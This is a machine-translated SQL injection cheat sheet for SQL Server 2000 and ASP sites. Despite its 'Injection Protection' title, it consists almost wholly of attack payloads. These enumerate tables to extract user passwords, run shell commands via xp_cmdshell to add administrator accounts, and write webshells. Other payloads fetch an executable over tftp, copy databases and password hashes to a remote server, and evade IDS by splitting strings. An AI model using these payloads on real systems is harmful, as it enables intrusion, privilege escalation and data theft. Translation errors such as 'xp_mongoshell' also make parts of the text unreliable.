SQL Server 2000 Injection Protection
SQL Injection originated from 'or '1' = '1
The most important table name:
Select * From sysobjects
Sysobjects ncsysobjects
Sysindexes tsysindexes
Syscolumns
Policypes
Sysusers
Sysdatabases
Sysxlogins
Sysprocesses
The most important user names (the default SQL database exists)
Public
DBO
Guest (generally forbidden or not authorized)
Db_sercurityadmin
AB _dlladmin
Some default extensions
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
Xp_availablemedia drive
Xp_dirtree directory
Xp_enumdsn ODBC connection
Xp_loginconfig server security mode information
Xp_makecab: Create a compressed volume
Xp_ntsec_enumdomains Domain Information
Xp_terminate_process terminal process, and a PID is provided.
For example:
Sp_addextendedproc 'xp _ webserver', 'c:/temp/xp_foo.dll'
Exec xp_webserver
Sp_dropextendedproc 'xp _ webserver'
BCP "select * from test .. foo" queryout C:/inetpub/wwwroot/runcommand. asp
-C-slocalhost-USA-pfoobar
'Group by users. ID having 1 = 1-
'Group by users. ID, users. username, users. Password, users. privs having 1 = 1-
'; Insert into users values (666, 'attacker', 'foobar', 0 xFFFF )-
Union select top 1 column_name from information_schema.columns where table_name = 'logintable '-
Union select top 1 column_name from information_schema.columns where table_name = 'logintable' where column_name not in ('login _ id ')-
Union select top 1 column_name from information_schema.columns where table_name = 'logintable' where column_name not in ('login _ id', 'login _ name ')-
Union select top 1 login_name from logintable-
Union select top 1 password from logintable where login_name = 'rahul '--
Construct statement: query whether xp_cmdshell exists
'Union select @ version, 1, 1 --
And 1 = (select @ Version)
And 'sa '= (select system_user)
'Union select ret, 1, 1 from Foo --
'Union select Min (username), 1, 1 from users where username> 'a '-
'Union select Min (username), 1, 1 from users where username> 'admin '-
'Union select password, 1, 1 from users where username = 'admin '--
And user_name () = 'dbo'
And 0 <> (select user_name ()-
; Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/winnt/system32/cmd.exe/C net user swap 5245886/add'
And 1 = (select count (*) from Master. DBO. sysobjects where
Xtype = 'X' and name = 'xp _ cmdshell ')
; Exec master. DBO. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll'
1 = (% 20 select % 20 count (*) % 20 from % 20master. DBO. sysobjects % 20 where % 20 xtype = 'X' % 20and % 20 name = 'xp _ Your shell ')
And 1 = (select is_srvrolemember ('sysadmin') to determine whether the SA permission is
And 0 <> (select top 1 paths from newtable) -- database Brute Force
And 1 = (Select name from Master. DBO. sysdatabases where dbid = 7) Get the Database Name (from 1 to 5 is the System ID, 6 or more can be determined)
Create a virtual directory edisk:
Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', null, 'cscript.exe C:/inetpub/wwwroot/mkwebdir. vbs-W "Default web site"-V "E", "E :/"'
Access attributes: (write a webshell together)
Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', null, 'cscript.exe C:/inetpub/wwwroot/chaccess. vbs-A w3svc/1/root/e + browse'
And 0 <> (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6)
Submit dbid =, 9... to get more database names.
And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = 'U') brute-force to a table is assumed to be Admin
And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = 'U' and name not in ('admin') to obtain other tables.
And 0 <> (select count (*) from BBS. DBO. sysobjects where xtype = 'U' and name = 'admin'
And uid> (STR (ID) the value of the brute-force uid is assumed to be 18779569 uid = ID
And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 18779569) to obtain an admin field, which is assumed to be user_id
And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 18779569 and name not in
('Id',...) to expose other fields
And 0 <(select user_id from BBS. DBO. Admin where username> 1)
The user names can be obtained in sequence to get the password ..... Assume that fields such as user_id username and password exist.
Show. asp? Id =-1 Union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from Admin
Show. asp? Id =-1 Union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from Admin
(Union statements are popular everywhere, and access is also useful.
Special tips for database violence: % 5c = '/' or submit/AND/modify % 5
And 0 <> (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6)
And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = 'U ')
And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = 'U' and name not in ('address '))
And 0 <> (select count (*) from BBS. DBO. sysobjects where xtype = 'U' and name = 'admin' and uid> (STR (ID) determine the id value
And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 773577794) All fields
_ Blank> http://xx.xx.xx.xx/111.asp? Id = 3400; Create Table [DBO]. [swap] ([swappass] [char] (255 ));--
_ Blank> http://xx.xx.xx.xx/111.asp? Id = 3400 and (select top 1 swappass from SWAp) = 1
; Create Table newtable (ID int identity (500), paths varchar () Declare @ test varchar (20) exec master .. xp_regread @ rootkey = 'HKEY _ LOCAL_MACHINE ', @ key = 'System/CurrentControlSet/services/w3svc/parameters/virtual roots/', @ value_name = '/', values = @ test output insert into paths (PATH) values (@ test)
_ Blank> http: // 61.131.96.39/pageshow. asp? Tianname = Policy and Regulation & infoid = {57c4165a-4206-4c0d-a8d2-e70666ee4e08}; Use % 20 master; declare % 20 @ s % 20% 20int; Exec % 20sp_oacreate % 20 "wscript. shell ", @ s % 20out; Exec % 20sp_oamethod % 20 @ s," run ", null," cmd.exe % 20/C % 20 Ping % 201.1.1.1 ";--
The following figure shows the web path D:/xxxx:
_ Blank> http://xx.xx.xx.xx/111.asp? Id = 3400; Use ku1 ;--
_ Blank> http://xx.xx.xx.xx/111.asp? Id = 3400; Create Table cmd (STR image );--
The traditional test process with xp_cmdshell:
; Exec master .. xp_mongoshell 'dir'
; Exec master. DBO. sp_addlogin Hax ;--
; Exec master. DBO. sp_password null, Hax, Hax ;--
; Exec master. DBO. SP_ADDSRVROLEMEMBER Hax SysAdmin ;--
; Exec master. DBO. xp_mongoshell 'net user Hax 5258/workstations: */times: All/passwordchg: yes/passwordreq: yes/active: yes/add ';--
; Exec master. DBO. xp_mongoshell 'net localgroup administrators Hax/add ';--
Exec master.. xp_servicecontrol 'start', 'schedule'
Exec master .. xp_servicecontrol 'start', 'server'
Http://www.xxx.com/list.asp? Classid = 1; declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/winnt/system32/cmd.exe/C net user swap 5258/add'
; Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/winnt/system32/cmd.exe/C net localgroup administrators swap/add'
_ Blank> http: // localhost/show. asp? Id = 1'; Exec master .. xp_cmdshell 'tftp-I youip get file.exe '-
Declare @ A sysname set @ A = 'xp _ '+ 'your shell' exec @ a' dir C :/'
Declare @ A sysname set @ A = 'xp '+' _ cm '+ 'dshell' exec @ a' dir C :/'
; Declare @ A; Set @ A = db_name (); backup database @ A to disk = 'your IP address, your shared directory Bak. dat'
If it is restricted, you can.
Select * From OpenRowSet ('sqloledb', 'server'; 'sa'; '', 'select' OK! ''Exec master. DBO. sp_addlogin hax ')
Traditional query structure:
Select * from news where id =... and topic =... and .....
Admin 'and 1 = (select count (*) from [user] Where username = 'victime' and right (left (userpass, 01), 1) = '1 ') and userpass <>'
Select 123 ;--
; Use master ;--
: A' or name like 'fff % '; -- a user named FFFF is displayed.
'And 1 <> (select count (email) from [user]); --
; Update [users] Set email = (select top 1 name from sysobjects where xtype = 'U' and status> 0) Where name = 'ffffff ';--
Note:
The preceding statement is used to obtain the first user table in the database and put the table name in the FFFF user's mailbox field.
By viewing FFFF user information, you can obtain the first table named ad.
Then, the table ID is obtained based on the table name ad.
Ffff'; update [users] Set email = (select top 1 ID from sysobjects where xtype = 'U' and name = 'ad') Where name = 'ffffff ';--
In this way, you can get the name of the second table.
Ffff'; update [users] Set email = (select top 1 name from sysobjects where xtype = 'U' and ID> 581577110) Where name = 'ffffff ';--
Ffff'; update [users] Set email = (select top 1 count (ID) from password) Where name = 'ffffff ';--
Ffff'; update [users] Set email = (select top 1 PWD from password where id = 2)
Where name = 'ffff ';--
Ffff'; update [users] Set email = (select top 1 name from password where id = 2)
Where name = 'ffff ';--
Exec master.. xp_servicecontrol 'start', 'schedule'
Exec master .. xp_servicecontrol 'start', 'server'
Sp_addextendedproc 'xp _ webserver', 'c:/temp/xp_foo.dll'
Extended storage can be called using the following methods:
Exec xp_webserver
Once the extended storage is executed, you can delete it as follows:
Sp_dropextendedproc 'xp _ webserver'
Insert into users values (666, char (0x63) + char (0x68) + char (0x72) +
Char (0x69) + char (0x73), char (0x63) + char (0x68) + char (0x72) + char (0x69) + char (0x73), 0 xFFFF )-
Insert into users values (667,123,123, 0 xFFFF )-
Insert into users values (123, 'admin' '--', 'Password', 0 xFFFF )-
; And user> 0
; And (select count (*) from sysobjects)> 0
; And (select count (*) from mysysobjects)> 0 // Access Database
Introduction to injection:
A) id = 49 These injection parameters are numeric. The SQL statement is roughly as follows:
Select * from table name where field = 49
The injected parameter is id = 49 and [query condition], that is, the generated statement:
Select * from table name where field = 49 and [query condition]
(B) Class = the injection parameters of the series are simplified. The SQL statements are roughly as follows:
Select * from table name where field = 'series'
The injected parameters are class = series and [query conditions] And ''= ', that is, the generated statement:
Select * from table name where field = 'series' and [query conditions] And ''=''
(C) If parameters are not filtered during search, such as keyword = keyword, the original appearance of the SQL statement is roughly as follows:
Select * from table name where field like '% keyword %'
The injected parameter is keyword = 'and [query condition] And' % 25' = ', which is the generated statement:
Select * from table name where field like '%' and [query condition] And '%' = '%'
; And (select top 1 name from sysobjects where xtype = 'U' and status> 0)> 0
Sysobjects is a system table of sqlserver. It stores all table names, views, constraints, and other objects. xtype = 'U' and status> 0 indicates the table name created by the user, the preceding statement extracts the first table name and compares it with 0 to expose the table name with an error message.
; And (select top 1 col_name (object_id ('table name'), 1) from sysobjects)> 0
After obtaining the table name from ⑤, use object_id ('table name') to obtain the internal ID corresponding to the table name. col_name (table name ID, 1) represents the 1st field names of the table, replace 1 with 2, 3, 4... you can obtain the field names in the table to be guessed one by one.
Post.htm content: easy to input.
<IFRAME name = P src = # width = 800 Height = 350 frameborder = 0> </iframe>
<Br>
<Form action = http://test.com/count.asp target = P>
<Input name = "ID" value = "1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 ); -- "style =" width: 750 ">
<Input type = submit value = ">>>">
<Input type = hidden name = fno value = "2, 3">
</Form>
Name of his data table:
Id = 1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 );--
This is to update the first table name to the AAA field.
Read the first table, and the second table can be read as follows (ADD and name <> 'table name just obtained 'After the condition ').
Id = 1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name <> 'Vote ');--
Then Id = 1552 and exists (select * from AAA where AAA> 5)
Read the second table and read it one by one until it does not exist.
The read field is as follows:
Id = 1552; update AAA set AAA = (select top 1 col_name (object_id ('table name'), 1 ));--
Then Id = 1552 and exists (select * from AAA where AAA> 5) error.
Id = 1552; update AAA set AAA = (select top 1 col_name (object_id ('table name'), 2 ));--
Then Id = 1552 and exists (select * from AAA where AAA> 5) error.
Advanced Skills:
[Retrieve data table name] [update the field value to the table name, and read the value of this field to get the table name]
Update table name set field = (select top 1 name from sysobjects where xtype = u and status> 0 [and name <> 'your obtained table name' find one and add one]) [Where condition]
Select top 1 name from sysobjects where xtype = u and status> 0 and name not in ('table1', 'table2 ',...)
Create a database administrator account and a system administrator account through sqlserver injection vulnerability [the current account must be a SysAdmin Group]
[Obtain the field name of a data table] [update the field value to the field name, and then read the value of this field to obtain the field name]
Update table name set field = (select top 1 col_name (object_id ('name of the data table to be queried '), field column such as: 1) [Where condition]
Bypassing IDS detection [using variables]
Declare @ A sysname set @ A = 'xp _ '+ 'your shell' exec @ a' dir C :/'
Declare @ A sysname set @ A = 'xp '+' _ cm '+ 'dshell' exec @ a' dir C :/'
1. enable remote database
Basic syntax
Select * From OpenRowSet ('sqloledb', 'server = servername; uid = sa; Pwd = apachy_123 ', 'select * From table1 ')
Parameter: (1) oledb provider name
2. The connection string parameter can be any port used for connection, for example
Select * From OpenRowSet ('sqloledb', 'uid = sa; Pwd = apachy_123; Network = dbmssocn; address = 202.100.100.1, 1433; ', 'select * From table'
To copy the entire database of the target host, you must first establish a connection with the database on the target host (how to establish a remote connection on the target host, as mentioned earlier ), then insert all remote tables to the local table.
Basic Syntax:
Insert into OpenRowSet ('sqloledb', 'server = servername; uid = sa; Pwd = apachy_123 ', 'select * From table1') Select * From Table2
This line of statements copies all the data in table 2 on the target host to table 1 in the remote database. In actual use, modify the IP address and port of the connection string to point to the desired location, for example:
Insert into OpenRowSet ('sqloledb', 'uid = sa; Pwd = apachy_123; Network = dbmssocn; address = 202.100.100.1, 1433; ', 'select * From table1') Select * From Table2
Insert into OpenRowSet ('sqloledb', 'uid = sa; Pwd = hack3r; Network = dbmssocn; address = 202.100.100.1, 1433; ', 'select * From _ sysdatabases ')
Select * from Master. DBO. sysdatabases
Insert into OpenRowSet ('sqloledb', 'uid = sa; Pwd = hack3r; Network = dbmssocn; address = 202.100.100.1, 1433; ', 'select * From _ sysobjects ')
Select * From user_database.dbo.sysobjects
Insert into OpenRowSet ('sqloledb', 'uid = sa; Pwd = apachy_123; Network = dbmssocn; address = 202.100.100.1, 1433; ', 'select * From _ syscolumns ')
Select * From user_database.dbo.syscolumns
Then, you can see the database structure of the target host from the local database. This is easy to say. Copy the database:
Insert into OpenRowSet ('sqloledb', 'uid = sa; Pwd = apachy_123; Network = dbmssocn; address = 202.100.100.1, 1433; ', 'select * From table1 ') select * from database .. table1
Insert into OpenRowSet ('sqloledb', 'uid = sa; Pwd = apachy_123; Network = dbmssocn; address = 202.100.100.1, 1433; ', 'select * From table2 ') select * from database .. table 2
......
3. Copy the hash table)
This is actually an extended application of the replication database. The hash of the logon password is stored in sysxlogins. The method is as follows:
Insert into OpenRowSet ('sqloledb', 'uid = sa; Pwd = apachy_123; Network = dbmssocn; address = 202.100.100.1, 1433; ', 'select * From _ sysxlogins ') select * from database. DBO. sysxlogins
After obtaining the hash, you can perform brute-force cracking. This requires a lot of luck and time.
How to traverse a directory:
First create a temporary table: temp
'5; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
5'; insert temp exec master. DBO. xp_availablemedia; -- get all current drives
5'; insert into temp (ID) exec master. DBO. xp_subdirs 'C:/'; -- get the subdirectory list
5'; insert into temp (ID, num1) exec master. DBO. xp_dirtree 'C:/'; -- Obtain the directory tree structure of all subdirectories and import them to the temp table.
5'; insert into temp (ID) exec master. DBO. xp_mongoshell 'Type C:/web/index. asp '; -- view the content of a file
5'; insert into temp (ID) exec master. DBO. xp_mongoshell 'dir C :/';--
5'; insert into temp (ID) exec master. DBO. xp_mongoshell 'dir C:/*. asp/S/';--
5'; insert into temp (ID) exec master. DBO. xp_mongoshell 'cscript C:/inetpub/adminscripts/adsutil. vbs Enum W3SVC'
5'; insert into temp (ID, num1) exec master. DBO. xp_dirtree 'C:/'; -- (permission public applies to xp_dirtree)
Write table:
Statement 1: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('sysadmin '));--
Statement 2: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('serveradmin '));--
Statement 3: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('setupadmin '));--
Statement 4: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('securityadmin '));--
Statement 5: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('securityadmin '));--
Statement 6: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('diskadmin '));--
Statement 7: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('bulkadmin '));--
Statement 8: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_srvrolemember ('bulkadmin '));--
Statement 9: _ blank> http://www.xxxxx.com/down/list.asp? Id = 1 and 1 = (select is_member ('db _ owner '));--
Write the path to the table:
_ Blank> http://www.xxxxx.com/down/list.asp? Id = 1; Create Table dirs (paths varchar (100), Id INT )-
_ Blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. DBO. xp_dirtree 'C :/'-
_ Blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
_ Blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs where paths not in ('@ inetpub '))-
Statement: _ blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1; Create Table dirs1 (paths varchar (100), Id INT )--
Statement: _ blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. DBO. xp_dirtree 'e:/web '--
Statement: _ blank> http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs1 )-